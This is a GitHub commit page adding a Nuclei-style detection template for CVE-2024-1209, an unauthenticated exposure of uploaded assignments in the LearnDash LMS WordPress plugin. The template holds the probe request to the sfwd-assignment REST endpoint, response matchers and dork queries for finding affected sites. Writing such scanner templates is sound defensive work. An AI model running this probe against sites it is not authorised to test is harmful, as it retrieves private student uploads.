Skip to content

Commit

Permalink
Create CVE-2024-1209.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
ritikchaddha committed Feb 20, 2024
1 parent 05a6184 commit cd42f5c
Showing 1 changed file with 53 additions and 0 deletions.
53 changes: 53 additions & 0 deletions http/cves/2024/CVE-2024-1209.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
id: CVE-2024-1209

info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
- https://github.com/karlemilnikka/CVE-2024-1209
- https://nvd.nist.gov/vuln/detail/CVE-2024-1209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1209
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash

http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"

host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- 'slug":"assignment'
- '.pdf"'
condition: and

- type: word
part: header
words:
- 'application/json'

- type: status
status:
- 200

0 comments on commit cd42f5c

Please sign in to comment.